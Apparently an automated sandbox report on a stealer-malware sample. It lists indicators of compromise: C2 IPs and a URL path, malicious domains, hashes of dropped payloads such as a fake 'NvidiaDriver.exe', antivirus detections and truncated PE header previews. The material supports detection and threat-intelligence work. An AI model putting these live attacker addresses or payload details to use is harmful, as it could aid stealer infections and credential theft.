                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      185.215.113.43file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                      104.21.81.153Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          172.67.165.166Purchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.xaqh.info/vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          atten-supporse.bizfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          se-blurry.bizft.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.162.65
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.162.65
                                                                                                                                          jgurtgjasdth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.162.65
                                                                                                                                          Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                                                          • 172.67.162.65
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.81.153
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          FToZAUe1tw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.74.192
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 172.67.184.109
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          FToZAUe1tw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.74.192
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 172.67.184.109
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 104.21.16.9
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          file.exeGet hashmaliciousQuasarBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          ugjigghFzZ.exeGet hashmaliciousQuasarBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          List of required items.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.9.168
                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.165.166
                                                                                                                                          • 104.21.9.168
                                                                                                                                          • 104.21.81.153
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe
                                                                                                                                          File Type:CSV text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):425
                                                                                                                                          Entropy (8bit):5.353683843266035
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1892352
                                                                                                                                          Entropy (8bit):7.94828236737595
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:eC+gj4JCdHVFAJtM8uYkOKyDq9AsMgx5F7ff5EkpXamt:e+UoMcJj+EBxL7JEkpXam
                                                                                                                                          MD5:6367FB8A64F997BE8D65536534BDD057
                                                                                                                                          SHA1:3EE062142DDE2330881566A63A92957037A0E6B3
                                                                                                                                          SHA-256:BDAE46A5CB1F1B6B9864B5E944ED5B2E24622D7385A196E0293F7B9DA59BDA5E
                                                                                                                                          SHA-512:ACE2DBBA313180A64F70F49C7763FB9DA23EF76B82548C8FA54A7D1E8D4810CAD83726FE532459660E12E4F6A9210DF09DD836EA28F1CC5A791A4873B95A274C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Pg..............................J...........@...........................J.....].....@.................................\0..p.... .......................1...................................................................................... . .........2..................@....rsrc........ .......B..............@....idata .....0.......F..............@... ..*..@.......H..............@...tgrwqosf.p....0..p...J..............@...iapomrjr......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1892352
                                                                                                                                          Entropy (8bit):7.94828236737595
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:eC+gj4JCdHVFAJtM8uYkOKyDq9AsMgx5F7ff5EkpXamt:e+UoMcJj+EBxL7JEkpXam
                                                                                                                                          MD5:6367FB8A64F997BE8D65536534BDD057
                                                                                                                                          SHA1:3EE062142DDE2330881566A63A92957037A0E6B3
                                                                                                                                          SHA-256:BDAE46A5CB1F1B6B9864B5E944ED5B2E24622D7385A196E0293F7B9DA59BDA5E
                                                                                                                                          SHA-512:ACE2DBBA313180A64F70F49C7763FB9DA23EF76B82548C8FA54A7D1E8D4810CAD83726FE532459660E12E4F6A9210DF09DD836EA28F1CC5A791A4873B95A274C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Pg..............................J...........@...........................J.....].....@.................................\0..p.... .......................1...................................................................................... . .........2..................@....rsrc........ .......B..............@....idata .....0.......F..............@... ..*..@.......H..............@...tgrwqosf.p....0..p...J..............@...iapomrjr......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):25600
                                                                                                                                          Entropy (8bit):5.537196873554178
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:cfwWhmmDybASNMJH5omqXtSkSCbrmzRZQ+4+aXM3E5CxYibYjDPC4GV2Wd/z:ihmmDybAmMppobl31+4J8058AnGnV
                                                                                                                                          MD5:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          SHA1:6F2C8105339073D52E89BAAFD88630DF18A84305
                                                                                                                                          SHA-256:573460D6BD19D1813D996344CED20BA39655EE5B29CD80E5CDEB9D3077B056D2
                                                                                                                                          SHA-512:47F1ACC68A1BE6F35E54B26D3FFE0F6DAF64C011D7B289D0403884C8B09D3F2A9CD8D42A1194F5C500BCB1A6351885D288C6C2E3A956AF56A1F2BC95CD44B5EE
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\............."...0..Z...........y... ........@.. ....................................`..................................y..O....................................y..8............................................ ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................y......H........G...1...........................................................0..7.........(....}.......}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..0..G.........(....}.......}.......}.......}.......}......|......(...+..|....(....*..(....*..0..j.......r...p.....r...p.....r5..p.....(....r[..p(.........(....o.........~....~....(.........~....~....(.........*...0...........(....o ......(!...*.0..7.........(....}@......}
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1461248
                                                                                                                                          Entropy (8bit):7.405346920581365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:7CZ0v6c8cawPzUopzenuwMloUm8CG1Xw+Eahn3R5+8pzb2hyS333XuuW8888DGAn:7x6c8caYzUopzenuwMloUm8CG1Xw+EaK
                                                                                                                                          MD5:7CB559130BBD743D4CDB0891749C5643
                                                                                                                                          SHA1:7E8CB60118A778A23FE6215C790ACE9F730E87FB
                                                                                                                                          SHA-256:08C071698F610C4B2AD9A8C18FFAC37B4DB9728CFF608EB92E7C0728EE5A2482
                                                                                                                                          SHA-512:75D1C0C1F7A5B141847F6BDAB88DAD4BA2D71E6B857AE92F3B60053C98BC6C1672261BAA2871D8FA4F2823AF942278017ADFC2E08A6A6670EADC73FC57F7D6BC
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........"..<N.........(.@...F...............P....@.................................JL....@... ..............................@..0........)......................tP..........................,........................B..h............................text....>.......@..................`..`.data........P.......F..............@....rdata......p.......d..............@..@.bss.........0...........................idata..0....@......................@....CRT....4....`.......*..............@....tls.........p.......,..............@....rsrc....).......*..................@..@.reloc..tP.......R...X..............@..B/4..................................@..B/19......\... ...^..................@..B/31.................................@..B/45.................................@..B/57.....4............*..............@..B/70..................0..............@..B/81..................2..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):25600
                                                                                                                                          Entropy (8bit):5.537196873554178
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:cfwWhmmDybASNMJH5omqXtSkSCbrmzRZQ+4+aXM3E5CxYibYjDPC4GV2Wd/z:ihmmDybAmMppobl31+4J8058AnGnV
                                                                                                                                          MD5:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          SHA1:6F2C8105339073D52E89BAAFD88630DF18A84305
                                                                                                                                          SHA-256:573460D6BD19D1813D996344CED20BA39655EE5B29CD80E5CDEB9D3077B056D2
                                                                                                                                          SHA-512:47F1ACC68A1BE6F35E54B26D3FFE0F6DAF64C011D7B289D0403884C8B09D3F2A9CD8D42A1194F5C500BCB1A6351885D288C6C2E3A956AF56A1F2BC95CD44B5EE
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\............."...0..Z...........y... ........@.. ....................................`..................................y..O....................................y..8............................................ ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................y......H........G...1...........................................................0..7.........(....}.......}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..0..G.........(....}.......}.......}.......}.......}......|......(...+..|....(....*..(....*..0..j.......r...p.....r...p.....r5..p.....(....r[..p(.........(....o.........~....~....(.........~....~....(.........*...0...........(....o ......(!...*.0..7.........(....}@......}
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):25600
                                                                                                                                          Entropy (8bit):5.537196873554178
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:cfwWhmmDybASNMJH5omqXtSkSCbrmzRZQ+4+aXM3E5CxYibYjDPC4GV2Wd/z:ihmmDybAmMppobl31+4J8058AnGnV
                                                                                                                                          MD5:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          SHA1:6F2C8105339073D52E89BAAFD88630DF18A84305
                                                                                                                                          SHA-256:573460D6BD19D1813D996344CED20BA39655EE5B29CD80E5CDEB9D3077B056D2
                                                                                                                                          SHA-512:47F1ACC68A1BE6F35E54B26D3FFE0F6DAF64C011D7B289D0403884C8B09D3F2A9CD8D42A1194F5C500BCB1A6351885D288C6C2E3A956AF56A1F2BC95CD44B5EE
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\............."...0..Z...........y... ........@.. ....................................`..................................y..O....................................y..8............................................ ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................y......H........G...1...........................................................0..7.........(....}.......}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..0..G.........(....}.......}.......}.......}.......}......|......(...+..|....(....*..(....*..0..j.......r...p.....r...p.....r5..p.....(....r[..p(.........(....o.........~....~....(.........~....~....(.........*...0...........(....o ......(!...*.0..7.........(....}@......}
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3296768
                                                                                                                                          Entropy (8bit):6.655721818767042
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:kVF+M26kfUw7yoxeBqOo7NjGOTIkets5JsE8p7OuEFWH:e4M26kfUwGoxeBqV7BVtZheKuEU
                                                                                                                                          MD5:41F7104E635F418EC5A33D817B5324D9
                                                                                                                                          SHA1:7C9A3124D4BF236A560C6A865B0034F79A65F875
                                                                                                                                          SHA-256:3301F21B0E9B43873293F712C6A8ECCB7746C09207E0CEDCFE836D060862C6F8
                                                                                                                                          SHA-512:7DFD8E767BE1B7904FF44B90CBC973A577F831DB0DC81C44167838146A8912EFE3631510FCF37451396206613419CA6D0FA0554A74AF1764D50C056A3B66338E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P2...........@...........................2.......2...@.................................W...k............................>2..............................>2..................................................... . ............................@....rsrc...............................@....idata ............................@...fuapnweu..+.......+.................@...sdiwzxtv.....@2......&2.............@....taggant.0...P2.."...,2.............@...........................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:40 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.935528661664402
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HsBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8MBetVRbf0qa0PjtyF
                                                                                                                                          MD5:4BB7878759F5E97842064036F35CF94E
                                                                                                                                          SHA1:D70D01D28CFAA02554B856E39B7DCA3818BB0CCF
                                                                                                                                          SHA-256:401FA85CC63782A37867E0EAFF2DB9A0943E695A81C7A11FC74755CD20ACA5E5
                                                                                                                                          SHA-512:83A52063EC5A160B387C81579B866BEB868517C2AF69FEE229542C3903A8C5D44F1BA55BCE0DDFF904EA405684B052A2CAC84C3F0F29B6D77AA58A3263C0C735
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..r....I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:41 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.93646394526828
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HdxBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:89xBetVRbf0qa0PjtyF
                                                                                                                                          MD5:946B9DBBE7EAF3648993D8407C67A82E
                                                                                                                                          SHA1:5E5A28288C8C2F7C1E2D1D7FFFF013179C2862D8
                                                                                                                                          SHA-256:6266C627747221B7E2F2DEFE78BDC150841B02AF678DCCC632175874C702A668
                                                                                                                                          SHA-512:4B9237AF13247FA094933118FEEECF993D58CA13342BE56C0AE29465C2A445D4427D75A784F9B46E4E80F481BBBCBEDB08F6AC91CB0C2BE1D32823243DB3841E
                                                                                                                                          Malicious:false
